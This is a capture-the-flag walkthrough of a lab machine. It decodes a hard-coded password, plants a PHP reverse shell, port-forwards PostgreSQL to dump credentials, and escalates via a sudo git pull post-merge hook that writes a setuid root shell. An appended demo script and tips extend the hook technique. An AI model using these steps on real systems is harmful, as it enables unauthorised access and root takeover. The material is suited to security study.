Machine IP: 10.10.10.114
DATE : 20/09/2019
START TIME: 8:05 PM
I’ve got two open ports. Let’s start our enumeration with the HTTP service.
When we visit the website we get a login page similar to the one we get when we try to log in to GitLab.
In the footer we can see three links.
About GitLab takes us to about.gitlab.com, so that is obviously not our vector. The other two options link to the machine IP, so I clicked on help and it gave me a directory listing.
I opened bookmark.html and it had a few other links.
I took all the hex values and converted them to strings using Python.
['value', 'user_login', 'getElementById', 'clave', 'user_password', '11des0081x']
So now we have the username and password.
After logging in we can see that there are two profile options.
I chose Administrator/profile and it had a lot of shell.php files, so most probably those were shells for other people working on the server 😄😄. I encountered a very funny name.
I edited index.php with the pentest monkey PHP reverse shell and then visited /settings, which triggered the reverse shell.
I looked around but couldn’t find anything. @theart42 said to look around the GitLab interface, and there I found a snippet for
So now we know that there is a table called profiles and the credential for postgres is
@theart42 told me that there is a psql service running. I ran netstat -antp and noticed that the default PostgreSQL port, 5432, was open.
The problem is that this is running inside a Docker container. We need to forward the port to our machine so we can connect to it. I tried using nc for port forwarding but that didn’t work, so I had to start a Metasploit listener because it has an option to port forward. I started the msf listener and ran the following in the meterpreter session:
portfwd add -l 5432 -p 5432 -r 127.0.0.1
Once this is done, type shell and then run the following command:
psql -h 127.0.0.1 -U profiles -W
Now we can go to the profiles table and get the password for clave.
NOTE: I didn’t use the clave account to root it, so in a way you don’t even have to go for user.
There is a RemoteConnection.exe that we need to reverse, which might give us a way to root this machine. The problem was that I couldn’t figure out how to do it.
Privilege escalation (using git pull)
I found out that www-data has sudo privileges: www-data can run git pull as root. We can abuse this with a git hook (post-merge). To do this, first move the repo. I copied the profile repo to /tmp:
$ cp -r /var/www/html/profile /tmp/
After that we need to make a post-merge hook in the copied repo:
echo '#!/bin/sh' > post-merge
echo 'cp /bin/sh /tmp' >> post-merge
echo 'chown root:root /tmp/sh' >> post-merge
echo 'chmod 4755 /tmp/sh' >> post-merge
We are doing this because we want all of it to happen after the merge (post-merge). This hook will create a setuid root copy of sh in /tmp, which we can then use to give ourselves a root shell.
Now we need to add a new file and then merge it into the repo. Make sure to check Remove source branch after merge (check it while making the merge too). Merge that request and then, in the copied repo, run:
sudo -u root git pull
Now we can get the root flag.
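The post-merge trick above, as an added example that is not part of the original write-up: a throwaway upstream repo and a clone are built in a temp directory, a post-merge hook is installed in the clone, and a `git pull` that fast-forwards a new upstream commit fires the hook. The hook records the uid that ran it instead of dropping a setuid shell, so the demo needs no sudo. The repo paths, the file names and the commit identity are assumptions.

```shell
#!/bin/sh
# Added example (not code from the original write-up): shows why the
# post-merge trick works. A post-merge hook lives in the *local* clone and
# runs as whoever executes `git pull` there, so when that is
# `sudo -u root git pull` the hook body runs as root. Here the hook only
# records the uid that ran it, so the demo needs no sudo and runs entirely
# in a temp directory. Paths and names ("upstream", "clone", "hook_ran")
# and the commit identity are assumptions.
set -eu

# Commit helper with a throwaway identity; $1 = repo path, $2 = message.
git_commit() {
    git -C "$1" -c user.name=demo -c user.email=demo@example.invalid \
        commit -q -m "$2" >/dev/null
}

# Install a post-merge hook into the clone at $1. On the box the body would
# be the write-up's `cp /bin/sh /tmp; chown root:root /tmp/sh;
# chmod 4755 /tmp/sh`; here it writes a marker file to $2 instead.
install_hook() {
    hook="$1/.git/hooks/post-merge"
    cat > "$hook" <<EOF
#!/bin/sh
# git passes one argument: "1" for a squash merge, "0" otherwise.
echo "merged by uid \$(id -u) squash=\$1" > "$2"
EOF
    chmod +x "$hook"   # git silently ignores a hook that is not executable
}

# Returns (prints) the marker line written by the hook.
demo() {
    work=$(mktemp -d)
    up="$work/upstream"      # stands in for the GitLab project
    clone="$work/clone"      # stands in for the copy we can write hooks into
    marker="$work/hook_ran"

    git init -q "$up"
    echo "initial" > "$up/README"
    git -C "$up" add README
    git_commit "$up" "initial"
    git clone -q "$up" "$clone"

    install_hook "$clone" "$marker"

    # A new commit upstream: on the box, the merge request merged in GitLab.
    echo "new file" > "$up/trigger.txt"
    git -C "$up" add trigger.txt
    git_commit "$up" "trigger"

    # Victim side: the pull fast-forwards and post-merge fires.
    git -C "$clone" pull -q --ff-only >/dev/null

    cat "$marker"            # e.g. "merged by uid 1000 squash=0"
    rm -rf "$work"
}

demo
```

Three things to check before relying on this on a target. The hook is only run if it is executable, so after the echo lines above you also need `chmod +x post-merge`. The setuid copy is of `/bin/sh`; if that is dash (the Debian/Ubuntu default) it keeps the effective uid, but if it is bash you must start it as `/tmp/sh -p` or bash drops the privileges. Finally, since git 2.35.2 the safe.directory check can refuse to operate in a repository owned by a different user (the exact behaviour under sudo has changed across versions), so if root's `git pull` in the www-data-owned copy fails with a "dubious ownership" error, that check is the reason.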
This was a beginner-level machine, since the only issue one might have is in running the RCE exploit.
Thanks to askar for making this machine.
Thanks for reading, Feedback is always appreciated.